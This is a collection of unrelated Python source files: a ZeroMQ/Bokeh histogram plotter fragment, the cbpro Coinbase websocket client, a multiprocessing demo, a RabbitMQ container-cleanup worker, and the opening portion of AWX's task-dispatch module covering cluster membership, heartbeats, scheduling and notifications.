plotData = dict(hist_M0=hist[0].tolist(),hist_M1=hist[1].tolist(),hist_M2=hist[2].tolist(),hist_M3=hist[3].tolist(),hist_M4=hist[4].tolist(),hist_M5=hist[5].tolist(),hist_M6=hist[6].tolist(),ledges_M0=edges[0][:-1].tolist(),ledges_M1=edges[1][:-1].tolist(),ledges_M2=edges[2][:-1].tolist(),ledges_M3=edges[3][:-1].tolist(),ledges_M4=edges[4][:-1].tolist(),ledges_M5=edges[5][:-1].tolist(),ledges_M6=edges[6][:-1].tolist(),redges_M0=edges[0][1:].tolist(),redges_M1=edges[1][1:].tolist(),redges_M2=edges[2][1:].tolist(),redges_M3=edges[3][1:].tolist(),redges_M4=edges[4][1:].tolist(),redges_M5=edges[5][1:].tolist(),redges_M6=edges[6][1:].tolist())
return(residualForces, plotData)
def subscribe_and_stream():
global fig
while True:
global socket_sub, fig
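# Poll the ZMQ SUB socket; on each message, unpickle the force data, compute residuals (measured - reference), rebuild the histograms and queue a Bokeh document update for the next tick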
try:
poller = zmq.Poller()
poller.register(socket_sub, zmq.POLLIN)
socks = dict(poller.poll())
if socket_sub in socks and socks[socket_sub] == zmq.POLLIN:
[topic, msg] = socket_sub.recv_multipart()
message = (pickle.loads(msg, encoding="latin1"))
measuredForces = message[0][0]
referenceForces = message[0][1]
residualForces = [(message[0][0][i]-message[0][1][i]) for i in range(7)]
commands = message[0][2]
timestamp = message[1]
diff = time.time() - timestamp
print(diff)
# if diff > 0.001:
# print("RESET CONNECTION")
# socket_sub = initialize_sub_socket(ip, port_sub)
hist,edges = modify_to_plot()
residualForces, plotData = compose_column_data_source_entry(timestamp, residualForces, hist, edges)
doc.add_next_tick_callback(partial(update,plotData,residualForces))
except KeyboardInterrupt:
print("CLEAN UP CLEAN UP EVERYBODY CLEANUP")
while not socket_sub.closed:
make_clean_exit(socket_sub)
colors = ["#762a83", "#76EEC6", "#53868B",
"#FF1493", "#ADFF2F", "#292421", "#EE6A50"]
gap = 1
fig = figure(plot_width=1400, plot_height=700, x_range=(-0.5,6.5))
for muscle_index in range(7):
loc = gap*muscle_index
line = Span(location=loc, dimension='height', line_color='black', line_dash='dashed', line_width=1)
fig.add_layout(line)
fig.quad(source=source_plot, top='hist_M%s'%muscle_index, bottom=0, left='ledges_M%s'%muscle_index, right='redges_M%s'%muscle_index, color=colors[muscle_index])
doc.add_root(fig)
socket_sub = initialize_sub_socket(ip, port_sub)
print("Plotting Histogram...")
thread = Thread(target=subscribe_and_stream)
thread.start()
|
websocket_client.py | # cbpro/WebsocketClient.py
# original author: Daniel Paquin
# mongo "support" added by Drew Rice
#
#
# Template object to receive messages from the Coinbase Websocket Feed
from __future__ import print_function
import json
import base64
import hmac
import hashlib
import time
from threading import Thread
from websocket import create_connection, WebSocketConnectionClosedException
from cbpro.cbpro_auth import get_auth_headers
class WebsocketClient(object):
def __init__(
self,
url="wss://ws-feed.pro.coinbase.com",
products=None,
message_type="subscribe",
mongo_collection=None,
should_print=True,
auth=False,
api_key="",
api_secret="",
api_passphrase="",
# Make channels a required keyword-only argument; see pep3102
*,
# Channel options: ['ticker', 'user', 'matches', 'level2', 'full']
channels):
self.url = url
self.products = products
self.channels = channels
self.type = message_type
self.stop = True
self.error = None
self.ws = None
self.thread = None
self.auth = auth
self.api_key = api_key
self.api_secret = api_secret
self.api_passphrase = api_passphrase
self.should_print = should_print
self.mongo_collection = mongo_collection
def start(self):
def _go():
self._connect()
self._listen()
self._disconnect()
self.stop = False
self.on_open()
self.thread = Thread(target=_go)
self.keepalive = Thread(target=self._keepalive)
self.thread.start()
def _connect(self):
if self.products is None:
self.products = ["BTC-USD"]
elif not isinstance(self.products, list):
self.products = [self.products]
if self.url[-1] == "/":
self.url = self.url[:-1]
if self.channels is None:
self.channels = [{"name": "ticker", "product_ids": [product_id for product_id in self.products]}]
sub_params = {'type': 'subscribe', 'product_ids': self.products, 'channels': self.channels}
else:
sub_params = {'type': 'subscribe', 'product_ids': self.products, 'channels': self.channels}
if self.auth:
timestamp = str(time.time())
message = timestamp + 'GET' + '/users/self/verify'
auth_headers = get_auth_headers(timestamp, message, self.api_key, self.api_secret, self.api_passphrase)
sub_params['signature'] = auth_headers['CB-ACCESS-SIGN']
sub_params['key'] = auth_headers['CB-ACCESS-KEY']
sub_params['passphrase'] = auth_headers['CB-ACCESS-PASSPHRASE']
sub_params['timestamp'] = auth_headers['CB-ACCESS-TIMESTAMP']
self.ws = create_connection(self.url)
self.ws.send(json.dumps(sub_params))
def _keepalive(self, interval=30):
while self.ws.connected:
self.ws.ping("keepalive")
time.sleep(interval)
def _listen(self):
self.keepalive.start()
while not self.stop:
try:
data = self.ws.recv()
msg = json.loads(data)
except ValueError as e:
self.on_error(e)
except Exception as e:
self.on_error(e)
else:
self.on_message(msg)
def _disconnect(self):
try:
if self.ws:
self.ws.close()
except WebSocketConnectionClosedException as e:
pass
finally:
self.keepalive.join()
self.on_close()
def close(self):
self.stop = True # will only disconnect after next msg recv
self._disconnect() # force disconnect so threads can join
self.thread.join()
def on_open(self):
if self.should_print:
print("-- Subscribed! --\n")
def on_close(self):
if self.should_print:
print("\n-- Socket Closed --")
def on_message(self, msg):
if self.should_print:
print(msg)
if self.mongo_collection: # dump JSON to given mongo collection
self.mongo_collection.insert_one(msg)
def on_error(self, e, data=None):
self.error = e
self.stop = True
print('{} - data: {}'.format(e, data))
if __name__ == "__main__":
import sys
import cbpro
import time
class MyWebsocketClient(cbpro.WebsocketClient):
def on_open(self):
self.url = "wss://ws-feed.pro.coinbase.com/"
self.products = ["BTC-USD", "ETH-USD"]
self.message_count = 0
print("Let's count the messages!")
def on_message(self, msg):
print(json.dumps(msg, indent=4, sort_keys=True))
self.message_count += 1
def on_close(self):
print("-- Goodbye! --")
wsClient = MyWebsocketClient()
wsClient.start()
print(wsClient.url, wsClient.products)
try:
while True:
print("\nMessageCount =", "%i \n" % wsClient.message_count)
time.sleep(1)
except KeyboardInterrupt:
wsClient.close()
if wsClient.error:
sys.exit(1)
else:
sys.exit(0)
|
2.py | from multiprocessing import Pool,Process
import time
import os
def info():
print 'module name:', __name__
if hasattr(os, 'getppid'): # only available on Unix
print 'parent process:', os.getppid()
print 'process id:', os.getpid()
def run(x):
info()
time.sleep(1)
print x**x
return x*x
def func1(x):
info()
time.sleep(1)
print 'func1'
return x*x
def func2(x):
info()
time.sleep(1)
print 'func2'
return x*x
def pool1():
testFL = [1, 2, 3, 4, 5, 6]
s = time.time()
for fn in testFL:
run(fn)
e1 = time.time()
print int(e1 - s)
p = Pool(5)
result = p.map(run, testFL)
print result
e2 = time.time()
print int(e2 - e1)
def join1():
p1 = Process(target=run, args=(1,))
p1.start()
p2 = Process(target=run, args=(2,))
p2.start()
p1.join()
p2.join()
print 'master begin'
info()
if __name__ == '__main__':
pool = Pool(3)
s = time.time()
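# Submit three jobs asynchronously to a 3-worker pool; each get() blocks until that job's result is ready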
result1 = pool.apply_async(func1, (1,))
result2 = pool.apply_async(func2, (2,))
result3 = pool.apply_async(func2, (3,))
print type(result1.get())
print result2.get()
print result3.get()
e = time.time()
print int(e - s)
pool.close()
pool.join()
|
CleanupWorkers.py | import json
import structlog
import pika
import config
from multiprocessing import Process
from ServiceManager import ServiceInfo, cleanupService
logger = structlog.get_logger()
def cleanupCallback(ch, method, properties, body):
"""Take service off of queue and delete its corresponding container"""
logger.info("cleanupCallback", msg="Recieved Message", body=body)
body = json.loads(body)
service = ServiceInfo(body)
log = logger.bind(service=service.__dict__)
log.info("cleanupCallback", msg="Cleaning Up Service")
cleanupService(service)
ch.basic_ack(delivery_tag=method.delivery_tag)
log.info("cleanupCallback", msg="Service Cleanup Done")
def cleanupWorker():
"""Declare cleanup queue and callback"""
connection = pika.BlockingConnection(pika.ConnectionParameters(config.RABBITMQ_SERVER))
channel = connection.channel()
channel.queue_declare(queue='cleanupQueue', durable=True)
logger.info("cleanupWorker", msg="Starting Cleanup Worker", queue="cleanupQueue")
channel.basic_consume(cleanupCallback, queue='cleanupQueue')
channel.start_consuming()
def startCleanupWorkers(numThreads):
"""Start numThreads cleanup workers"""
for i in range(numThreads):
t = Process(target=cleanupWorker)
t.daemon = True
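# Daemon workers are terminated automatically when the parent process exits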
t.start()
|
tasks.py | # -*- coding: utf-8 -*-
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from collections import OrderedDict, namedtuple, deque
import errno
import functools
import importlib
import json
import logging
import os
import shutil
import stat
import tempfile
import time
import traceback
from distutils.dir_util import copy_tree
from distutils.version import LooseVersion as Version
import yaml
import fcntl
from pathlib import Path
from uuid import uuid4
import urllib.parse as urlparse
import socket
import threading
import concurrent.futures
from base64 import b64encode
import subprocess
import sys
# Django
from django.conf import settings
from django.db import transaction, DatabaseError, IntegrityError
from django.db.models.fields.related import ForeignKey
from django.utils.timezone import now
from django.utils.encoding import smart_str
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _, gettext_noop
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django_guid.middleware import GuidMiddleware
# Django-CRUM
from crum import impersonate
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# Runner
import ansible_runner
# Receptor
from receptorctl.socket_interface import ReceptorControl
# AWX
from awx import __version__ as awx_application_version
from awx.main.constants import PRIVILEGE_ESCALATION_METHODS, STANDARD_INVENTORY_UPDATE_ENV, MINIMAL_EVENTS
from awx.main.access import access_registry
from awx.main.redact import UriCleaner
from awx.main.models import (
Schedule,
TowerScheduleState,
Instance,
InstanceGroup,
UnifiedJob,
Notification,
Inventory,
InventorySource,
SmartInventoryMembership,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.constants import ACTIVE_STATES
from awx.main.exceptions import AwxTaskError, PostRunError
from awx.main.queue import CallbackQueueDispatcher
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_local_queuename, reaper
from awx.main.utils import (
update_scm_url,
ignore_inventory_computed_fields,
ignore_inventory_group_removal,
extract_ansible_vars,
schedule_task_manager,
get_awx_version,
deepmerge,
parse_yaml_or_json,
cleanup_new_process,
)
from awx.main.utils.execution_environments import get_default_execution_environment, get_default_pod_spec, CONTAINER_ROOT, to_container_path
from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.external_logging import reconfigure_rsyslog
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.reload import stop_local_services
from awx.main.utils.pglock import advisory_lock
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.consumers import emit_channel_notification
from awx.main import analytics
from awx.conf import settings_registry
from awx.conf.license import get_license
from awx.main.analytics.subsystem_metrics import Metrics
from rest_framework.exceptions import PermissionDenied
__all__ = [
'RunJob',
'RunSystemJob',
'RunProjectUpdate',
'RunInventoryUpdate',
'RunAdHocCommand',
'handle_work_error',
'handle_work_success',
'apply_cluster_membership_policies',
'update_inventory_computed_fields',
'update_host_smart_inventory_memberships',
'send_notifications',
'purge_old_stdout_files',
]
HIDDEN_PASSWORD = '**********'
OPENSSH_KEY_ERROR = u'''\
It looks like you're trying to use a private key in OpenSSH format, which \
isn't supported by the installed version of OpenSSH on this instance. \
Try upgrading OpenSSH or providing your private key in a different format. \
'''
logger = logging.getLogger('awx.main.tasks')
class InvalidVirtualenvError(Exception):
def __init__(self, message):
self.message = message
def dispatch_startup():
startup_logger = logging.getLogger('awx.main.tasks')
startup_logger.debug("Syncing Schedules")
for sch in Schedule.objects.all():
try:
sch.update_computed_fields()
except Exception:
logger.exception("Failed to rebuild schedule {}.".format(sch))
#
# When the dispatcher starts, if the instance cannot be found in the database,
# automatically register it. This is mostly useful for openshift-based
# deployments where:
#
# 2 Instances come online
# Instance B encounters a network blip, Instance A notices, and
# deprovisions it
# Instance B's connectivity is restored, the dispatcher starts, and it
# re-registers itself
#
# In traditional container-less deployments, instances don't get
# deprovisioned when they miss their heartbeat, so this code is mostly a
# no-op.
#
apply_cluster_membership_policies()
cluster_node_heartbeat()
Metrics().clear_values()
# Update Tower's rsyslog.conf file based on logging settings in the db
reconfigure_rsyslog()
def inform_cluster_of_shutdown():
try:
this_inst = Instance.objects.get(hostname=settings.CLUSTER_HOST_ID)
this_inst.capacity = 0 # No thank you to new jobs while shut down
this_inst.save(update_fields=['capacity', 'modified'])
try:
reaper.reap(this_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(this_inst.hostname))
logger.warning('Normal shutdown signal for instance {}, ' 'removed self from capacity pool.'.format(this_inst.hostname))
except Exception:
logger.exception('Encountered problem with normal shutdown signal.')
@task(queue=get_local_queuename)
def apply_cluster_membership_policies():
started_waiting = time.time()
with advisory_lock('cluster_policy_lock', wait=True):
lock_time = time.time() - started_waiting
if lock_time > 1.0:
to_log = logger.info
else:
to_log = logger.debug
to_log('Waited {} seconds to obtain lock name: cluster_policy_lock'.format(lock_time))
started_compute = time.time()
all_instances = list(Instance.objects.order_by('id'))
all_groups = list(InstanceGroup.objects.prefetch_related('instances'))
total_instances = len(all_instances)
actual_groups = []
actual_instances = []
Group = namedtuple('Group', ['obj', 'instances', 'prior_instances'])
Node = namedtuple('Instance', ['obj', 'groups'])
# Process policy instance list first, these will represent manually managed memberships
instance_hostnames_map = {inst.hostname: inst for inst in all_instances}
for ig in all_groups:
group_actual = Group(obj=ig, instances=[], prior_instances=[instance.pk for instance in ig.instances.all()]) # obtained in prefetch
for hostname in ig.policy_instance_list:
if hostname not in instance_hostnames_map:
logger.info("Unknown instance {} in {} policy list".format(hostname, ig.name))
continue
inst = instance_hostnames_map[hostname]
group_actual.instances.append(inst.id)
# NOTE: arguable behavior: policy-list-group is not added to
# instance's group count for consideration in minimum-policy rules
if group_actual.instances:
logger.debug("Policy List, adding Instances {} to Group {}".format(group_actual.instances, ig.name))
actual_groups.append(group_actual)
# Process Instance minimum policies next, since it represents a concrete lower bound to the
# number of instances to make available to instance groups
actual_instances = [Node(obj=i, groups=[]) for i in all_instances if i.managed_by_policy]
logger.debug("Total instances: {}, available for policy: {}".format(total_instances, len(actual_instances)))
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_min_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if len(g.instances) >= g.obj.policy_instance_minimum:
break
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via the policy list
continue
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_min_added.append(i.obj.id)
if policy_min_added:
logger.debug("Policy minimum, adding Instances {} to Group {}".format(policy_min_added, g.obj.name))
# Finally, process instance policy percentages
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_per_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via a minimum policy or policy list
continue
if 100 * float(len(g.instances)) / len(actual_instances) >= g.obj.policy_instance_percentage:
break
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_per_added.append(i.obj.id)
if policy_per_added:
logger.debug("Policy percentage, adding Instances {} to Group {}".format(policy_per_added, g.obj.name))
# Determine if any changes need to be made
needs_change = False
for g in actual_groups:
if set(g.instances) != set(g.prior_instances):
needs_change = True
break
if not needs_change:
logger.debug('Cluster policy no-op finished in {} seconds'.format(time.time() - started_compute))
return
# On a differential basis, apply instances to groups
with transaction.atomic():
for g in actual_groups:
if g.obj.is_container_group:
logger.debug('Skipping containerized group {} for policy calculation'.format(g.obj.name))
continue
instances_to_add = set(g.instances) - set(g.prior_instances)
instances_to_remove = set(g.prior_instances) - set(g.instances)
if instances_to_add:
logger.debug('Adding instances {} to group {}'.format(list(instances_to_add), g.obj.name))
g.obj.instances.add(*instances_to_add)
if instances_to_remove:
logger.debug('Removing instances {} from group {}'.format(list(instances_to_remove), g.obj.name))
g.obj.instances.remove(*instances_to_remove)
logger.debug('Cluster policy computation finished in {} seconds'.format(time.time() - started_compute))
@task(queue='tower_broadcast_all')
def handle_setting_changes(setting_keys):
orig_len = len(setting_keys)
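# Expand the changed keys with their dependent settings so every affected cache entry is invalidated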
for i in range(orig_len):
for dependent_key in settings_registry.get_dependent_settings(setting_keys[i]):
setting_keys.append(dependent_key)
cache_keys = set(setting_keys)
logger.debug('cache delete_many(%r)', cache_keys)
cache.delete_many(cache_keys)
if any([setting.startswith('LOG_AGGREGATOR') for setting in setting_keys]):
reconfigure_rsyslog()
@task(queue='tower_broadcast_all')
def delete_project_files(project_path):
# TODO: possibly implement some retry logic
lock_file = project_path + '.lock'
if os.path.exists(project_path):
try:
shutil.rmtree(project_path)
logger.debug('Success removing project files {}'.format(project_path))
except Exception:
logger.exception('Could not remove project directory {}'.format(project_path))
if os.path.exists(lock_file):
try:
os.remove(lock_file)
logger.debug('Success removing {}'.format(lock_file))
except Exception:
logger.exception('Could not remove lock file {}'.format(lock_file))
@task(queue='tower_broadcast_all')
def profile_sql(threshold=1, minutes=1):
if threshold <= 0:
cache.delete('awx-profile-sql-threshold')
logger.error('SQL PROFILING DISABLED')
else:
cache.set('awx-profile-sql-threshold', threshold, timeout=minutes * 60)
logger.error('SQL QUERIES >={}s ENABLED FOR {} MINUTE(S)'.format(threshold, minutes))
@task(queue=get_local_queuename)
def send_notifications(notification_list, job_id=None):
if not isinstance(notification_list, list):
raise TypeError("notification_list should be of type list")
if job_id is not None:
job_actual = UnifiedJob.objects.get(id=job_id)
notifications = Notification.objects.filter(id__in=notification_list)
if job_id is not None:
job_actual.notifications.add(*notifications)
for notification in notifications:
update_fields = ['status', 'notifications_sent']
try:
sent = notification.notification_template.send(notification.subject, notification.body)
notification.status = "successful"
notification.notifications_sent = sent
if job_id is not None:
job_actual.log_lifecycle("notifications_sent")
except Exception as e:
logger.exception("Send Notification Failed {}".format(e))
notification.status = "failed"
notification.error = smart_str(e)
update_fields.append('error')
finally:
try:
notification.save(update_fields=update_fields)
except Exception:
logger.exception('Error saving notification {} result.'.format(notification.id))
@task(queue=get_local_queuename)
def gather_analytics():
from awx.conf.models import Setting
from rest_framework.fields import DateTimeField
last_gather = Setting.objects.filter(key='AUTOMATION_ANALYTICS_LAST_GATHER').first()
last_time = DateTimeField().to_internal_value(last_gather.value) if last_gather and last_gather.value else None
gather_time = now()
if not last_time or ((gather_time - last_time).total_seconds() > settings.AUTOMATION_ANALYTICS_GATHER_INTERVAL):
analytics.gather()
@task(queue=get_local_queuename)
def purge_old_stdout_files():
nowtime = time.time()
for f in os.listdir(settings.JOBOUTPUT_ROOT):
if os.path.getctime(os.path.join(settings.JOBOUTPUT_ROOT, f)) < nowtime - settings.LOCAL_STDOUT_EXPIRE_TIME:
os.unlink(os.path.join(settings.JOBOUTPUT_ROOT, f))
logger.debug("Removing {}".format(os.path.join(settings.JOBOUTPUT_ROOT, f)))
@task(queue=get_local_queuename)
def cleanup_execution_environment_images():
if settings.IS_K8S:
return
process = subprocess.run('podman images --filter="dangling=true" --format json'.split(" "), capture_output=True)
if process.returncode != 0:
logger.debug("Cleanup execution environment images: could not get list of images")
return
if len(process.stdout) > 0:
images_system = json.loads(process.stdout)
for e in images_system:
image_name = e["Id"]
logger.debug(f"Cleanup execution environment images: deleting {image_name}")
process = subprocess.run(['podman', 'rmi', image_name, '-f'], stdout=subprocess.DEVNULL)
if process.returncode != 0:
logger.debug(f"Failed to delete image {image_name}")
@task(queue=get_local_queuename)
def cluster_node_heartbeat():
logger.debug("Cluster node heartbeat task.")
nowtime = now()
instance_list = list(Instance.objects.all())
this_inst = None
lost_instances = []
(changed, instance) = Instance.objects.get_or_register()
if changed:
logger.info("Registered tower node '{}'".format(instance.hostname))
for inst in list(instance_list):
if inst.hostname == settings.CLUSTER_HOST_ID:
this_inst = inst
instance_list.remove(inst)
elif inst.is_lost(ref_time=nowtime):
lost_instances.append(inst)
instance_list.remove(inst)
if this_inst:
startup_event = this_inst.is_lost(ref_time=nowtime)
this_inst.refresh_capacity()
if startup_event:
logger.warning('Rejoining the cluster as instance {}.'.format(this_inst.hostname))
return
else:
raise RuntimeError("Cluster Host Not Found: {}".format(settings.CLUSTER_HOST_ID))
# IFF any node has a greater version than we do, then we'll shut down services
for other_inst in instance_list:
if other_inst.version == "":
continue
if Version(other_inst.version.split('-', 1)[0]) > Version(awx_application_version.split('-', 1)[0]) and not settings.DEBUG:
logger.error(
"Host {} reports version {}, but this node {} is at {}, shutting down".format(
other_inst.hostname, other_inst.version, this_inst.hostname, this_inst.version
)
)
# Shutdown signal will set the capacity to zero to ensure no Jobs get added to this instance.
# The heartbeat task will reset the capacity to the system capacity after upgrade.
stop_local_services(communicate=False)
raise RuntimeError("Shutting down.")
for other_inst in lost_instances:
try:
reaper.reap(other_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(other_inst.hostname))
try:
# Capacity could already be 0 because:
# * It's a new node and it never had a heartbeat
# * It was set to 0 by another tower node running this method
# * It was set to 0 by this node, but auto deprovisioning is off
#
# If auto deprovisioning is on, don't bother setting the capacity to 0
# since we will delete the node anyway.
if other_inst.capacity != 0 and not settings.AWX_AUTO_DEPROVISION_INSTANCES:
other_inst.capacity = 0
other_inst.save(update_fields=['capacity'])
logger.error("Host {} last checked in at {}, marked as lost.".format(other_inst.hostname, other_inst.modified))
elif settings.AWX_AUTO_DEPROVISION_INSTANCES:
deprovision_hostname = other_inst.hostname
other_inst.delete()
logger.info("Host {} Automatically Deprovisioned.".format(deprovision_hostname))
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Another instance has marked {} as lost'.format(other_inst.hostname))
else:
logger.exception('Error marking {} as lost'.format(other_inst.hostname))
@task(queue=get_local_queuename)
def awx_k8s_reaper():
if not settings.RECEPTOR_RELEASE_WORK:
return
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
for group in InstanceGroup.objects.filter(is_container_group=True).iterator():
logger.debug("Checking for orphaned k8s pods for {}.".format(group))
pods = PodManager.list_active_jobs(group)
for job in UnifiedJob.objects.filter(pk__in=pods.keys()).exclude(status__in=ACTIVE_STATES):
logger.debug('{} is no longer active, reaping orphaned k8s pod'.format(job.log_format))
try:
pm = PodManager(job)
pm.kube_api.delete_namespaced_pod(name=pods[job.id], namespace=pm.namespace, _request_timeout=settings.AWX_CONTAINER_GROUP_K8S_API_TIMEOUT)
except Exception:
logger.exception("Failed to delete orphaned pod {} from {}".format(job.log_format, group))
@task(queue=get_local_queuename)
def awx_periodic_scheduler():
with advisory_lock('awx_periodic_scheduler_lock', wait=False) as acquired:
if acquired is False:
logger.debug("Not running periodic scheduler, another task holds lock")
return
logger.debug("Starting periodic scheduler")
run_now = now()
state = TowerScheduleState.get_solo()
last_run = state.schedule_last_run
logger.debug("Last scheduler run was: %s", last_run)
state.schedule_last_run = run_now
state.save()
old_schedules = Schedule.objects.enabled().before(last_run)
for schedule in old_schedules:
schedule.update_computed_fields()
schedules = Schedule.objects.enabled().between(last_run, run_now)
invalid_license = False
try:
access_registry[Job](None).check_license(quiet=True)
except PermissionDenied as e:
invalid_license = e
for schedule in schedules:
template = schedule.unified_job_template
schedule.update_computed_fields() # To update next_run timestamp.
if template.cache_timeout_blocked:
logger.warn("Cache timeout is in the future, bypassing schedule for template %s" % str(template.id))
continue
try:
job_kwargs = schedule.get_job_kwargs()
new_unified_job = schedule.unified_job_template.create_unified_job(**job_kwargs)
logger.debug('Spawned {} from schedule {}-{}.'.format(new_unified_job.log_format, schedule.name, schedule.pk))
if invalid_license:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = str(invalid_license)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
raise invalid_license
can_start = new_unified_job.signal_start()
except Exception:
logger.exception('Error spawning scheduled job.')
continue
if not can_start:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = gettext_noop(
"Scheduled job could not start because it \
was not in the right state or required manual credentials"
)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
emit_channel_notification('schedules-changed', dict(id=schedule.id, group_name="schedules"))
state.save()
@task(queue=get_local_queuename)
def handle_work_success(task_actual):
try:
instance = UnifiedJob.get_instance_by_type(task_actual['type'], task_actual['id'])
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in success callback.'.format(task_actual['type'], task_actual['id']))
return
if not instance:
return
schedule_task_manager()
@task(queue=get_local_queuename)
def handle_work_error(task_id, *args, **kwargs):
subtasks = kwargs.get('subtasks', None)
logger.debug('Executing error task id %s, subtasks: %s' % (task_id, str(subtasks)))
first_instance = None
first_instance_type = ''
if subtasks is not None:
for each_task in subtasks:
try:
instance = UnifiedJob.get_instance_by_type(each_task['type'], each_task['id'])
if not instance:
# Unknown task type
logger.warn("Unknown task type: {}".format(each_task['type']))
continue
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in error callback.'.format(each_task['type'], each_task['id']))
continue
if first_instance is None:
first_instance = instance
first_instance_type = each_task['type']
if instance.celery_task_id != task_id and not instance.cancel_flag and not instance.status == 'successful':
instance.status = 'failed'
instance.failed = True
if not instance.job_explanation:
instance.job_explanation = 'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}' % (
first_instance_type,
first_instance.name,
first_instance.id,
)
instance.save()
instance.websocket_emit_status("failed")
# We only send 1 job complete message since all the job completion message
# handling does is trigger the scheduler. If we extend the functionality of
# what the job complete message handler does then we may want to send a
# completion event for each job here.
if first_instance:
schedule_task_manager()
pass
@task(queue=get_local_queuename)
def handle_success_and_failure_notifications(job_id):
uj = UnifiedJob.objects.get(pk=job_id)
retries = 0
while retries < 5:
if uj.finished:
uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
return
else:
# wait a few seconds to avoid a race where the
# events are persisted _before_ the UJ.status
# changes from running -> successful
retries += 1
time.sleep(1)
uj = UnifiedJob.objects.get(pk=job_id)
logger.warn(f"Failed to even try to send notifications for job '{uj}' due to job not being in finished state.")
@task(queue=get_local_queuename)
def update_inventory_computed_fields(inventory_id):
"""
Signal handler and wrapper around inventory.update_computed_fields to
prevent unnecessary recursive calls.
"""
i = Inventory.objects.filter(id=inventory_id)
if not i.exists():
logger.error("Update Inventory Computed Fields failed due to missing inventory: " + str(inventory_id))
return
i = i[0]
try:
i.update_computed_fields()
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Exiting duplicate update_inventory_computed_fields task.')
return
raise
def update_smart_memberships_for_inventory(smart_inventory):
current = set(SmartInventoryMembership.objects.filter(inventory=smart_inventory).values_list('host_id', flat=True))
new = set(smart_inventory.hosts.values_list('id', flat=True))
additions = new - current
removals = current - new
if additions or removals:
with transaction.atomic():
if removals:
SmartInventoryMembership.objects.filter(inventory=smart_inventory, host_id__in=removals).delete()
if additions:
add_for_inventory = [SmartInventoryMembership(inventory_id=smart_inventory.id, host_id=host_id) for host_id in additions]
SmartInventoryMembership.objects.bulk_create(add_for_inventory, ignore_conflicts=True)
logger.debug(
'Smart host membership cached for {}, {} additions, {} removals, {} total count.'.format(
smart_inventory.pk, len(additions), len(removals), len(new)
)
)
return True # changed
return False
@task(queue=get_local_queuename)
def update_host_smart_inventory_memberships():
smart_inventories = Inventory.objects.filter(kind='smart', host_filter__isnull=False, pending_deletion=False)
changed_inventories = set([])
for smart_inventory in smart_inventories:
try:
changed = update_smart_memberships_for_inventory(smart_inventory)
if changed:
changed_inventories.add(smart_inventory)
except IntegrityError:
logger.exception('Failed to update smart inventory memberships for {}'.format(smart_inventory.pk))
# Update computed fields for changed inventories outside atomic action
for smart_inventory in changed_inventories:
smart_inventory.update_computed_fields()
@task(queue=get_local_queuename)
def delete_inventory(inventory_id, user_id, retries=5):
# Delete inventory as user
if user_id is None:
user = None
else:
try:
user = User.objects.get(id=user_id)
except Exception:
user = None
with ignore_inventory_computed_fields(), ignore_inventory_group_removal(), impersonate(user):
try:
i = Inventory.objects.get(id=inventory_id)
for host in i.hosts.iterator():
host.job_events_as_primary_host.update(host=None)
i.delete()
emit_channel_notification('inventories-status_changed', {'group_name': 'inventories', 'inventory_id': inventory_id, 'status': 'deleted'})
logger.debug('Deleted inventory {} as user {}.'.format(inventory_id, user_id))
except Inventory.DoesNotExist:
logger.exception("Delete Inventory failed due to missing inventory: " + str(inventory_id))
return
except DatabaseError:
logger.exception('Database error deleting inventory {}, but will retry.'.format(inventory_id))
if retries > 0:
time.sleep(10)
delete_inventory(inventory_id, user_id, retries=retries - 1)
def with_path_cleanup(f):
@functools.wraps(f)
def _wrapped(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
finally:
for p in self.cleanup_paths:
try:
if os.path.isdir(p):
shutil.rmtree(p, ignore_errors=True)
elif os.path.exists(p):
os.remove(p)
except OSError:
logger.exception("Failed to remove tmp file: {}".format(p))
self.cleanup_paths = []
return _wrapped
class BaseTask(object):
model = None
event_model = None
abstract = True
def __init__(self):
self.cleanup_paths = []
self.parent_workflow_job_id = None
self.host_map = {}
self.guid = GuidMiddleware.get_guid()
self.job_created = None
self.recent_event_timings = deque(maxlen=settings.MAX_WEBSOCKET_EVENT_RATE)
def update_model(self, pk, _attempt=0, **updates):
"""Reload the model instance from the database and update the
given fields.
"""
try:
with transaction.atomic():
# Retrieve the model instance.
instance = self.model.objects.get(pk=pk)
# Update the appropriate fields and save the model
# instance, then return the new instance.
if updates:
update_fields = ['modified']
for field, value in updates.items():
setattr(instance, field, value)
update_fields.append(field)
if field == 'status':
update_fields.append('failed')
instance.save(update_fields=update_fields)
return instance
except DatabaseError as e:
# Log out the error to the debug logger.
logger.debug('Database error updating %s, retrying in 5 ' 'seconds (retry #%d): %s', self.model._meta.object_name, _attempt + 1, e)
